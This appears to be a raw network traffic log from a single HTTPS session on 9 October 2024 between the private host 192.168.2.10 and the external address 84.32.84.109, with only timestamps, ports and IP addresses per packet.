Oct 9, 2024 16:16:07.489308119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.489428997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.489434958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.489468098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495532036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495574951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495604038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495620966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495630026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495644093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495661020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495675087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495703936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495718956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495718956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495726109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495737076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495739937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495781898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495781898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495785952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495798111 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.495841980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.495841980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.515436888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.515538931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.515553951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.515702009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.516071081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.516117096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.516150951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.516190052 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.554080963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.554117918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.554186106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.554195881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.554195881 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.554208994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.554224968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.554225922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.554404020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.554411888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.554605007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.575825930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.575897932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.575923920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.575995922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576000929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576172113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576178074 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576231003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576239109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576250076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576288939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576293945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576387882 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576410055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576530933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576613903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576663017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576682091 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576688051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576706886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576756001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576843023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576849937 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576925039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576942921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576947927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576961040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.576975107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.576987028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.577022076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.577022076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.577029943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.577116966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.577151060 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.577157021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.577191114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.578505039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578634977 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.578646898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578700066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578752995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.578752995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.578762054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578783989 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578876019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578921080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.578921080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.578929901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.578964949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.579051971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.579098940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.579098940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.579108953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.579144001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.579350948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.579358101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.579417944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.580338955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.605721951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.605767012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.605797052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.605854988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.605871916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.605933905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.605933905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.641736984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.641835928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.641850948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.641872883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.641908884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.641927004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.642074108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.642081022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.642189980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.663811922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.663907051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.663961887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664021969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664066076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664132118 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664150953 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664211035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664258003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664341927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664391041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664391041 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664402008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664460897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664520025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664527893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664561033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664583921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664640903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664649010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664680958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664707899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664771080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664865017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664895058 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.664906025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664962053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.664973021 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665061951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665086985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665093899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665149927 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665173054 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665225983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665272951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665272951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665282011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665299892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665343046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665349960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665453911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665548086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665607929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665708065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665791988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665837049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665837049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.665844917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.665962934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666014910 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666024923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666059017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666083097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666089058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666131973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666178942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666234016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666240931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666263103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666316986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666316986 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666323900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666338921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666388988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.666395903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.666445017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.693567991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.693708897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.693761110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.693761110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.693778038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.693799973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.693820953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.693839073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.693864107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.693892002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.694324970 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.694334030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.694375038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.729845047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.729935884 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.729990005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.730046034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.730081081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.730149984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.730161905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.730191946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.730212927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.730283976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.751514912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751686096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751702070 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.751713037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751743078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.751770020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751816988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.751831055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751868963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751873016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.751894951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.751920938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.751998901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752068996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752075911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752090931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752140045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752140045 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752146959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752197981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752355099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752391100 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752398014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752475023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752513885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752577066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752583981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752613068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752624035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752706051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752734900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752743006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752758026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752774954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752813101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752962112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.752981901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.752989054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753007889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753032923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753233910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753264904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753271103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753340006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753458977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753508091 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753515005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753554106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753559113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753582954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753609896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753699064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753778934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753814936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753814936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.753823996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753876925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753958941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.753989935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.754005909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.754036903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.754039049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.754039049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.754076004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.754085064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.754115105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.754280090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.754437923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.781063080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.781111002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.781146049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.781174898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.781193018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.781208038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.781260014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.781260967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.817430973 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.817526102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.817529917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.817557096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.817574978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.817614079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.817655087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.817655087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.817662954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.838960886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839059114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839075089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839097977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839119911 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839126110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839138985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839217901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839231014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839252949 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839260101 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839281082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839396000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839422941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839442015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839447975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839464903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839580059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839605093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839606047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839616060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839663982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839725018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839766979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839773893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839870930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.839956999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.839996099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840001106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840013027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840023994 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840034008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840069056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840089083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840095043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840112925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840285063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840320110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840326071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840358019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:07.840364933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:07.840404034 CEST	49723	443	192.168.2.10	84.32.84.109
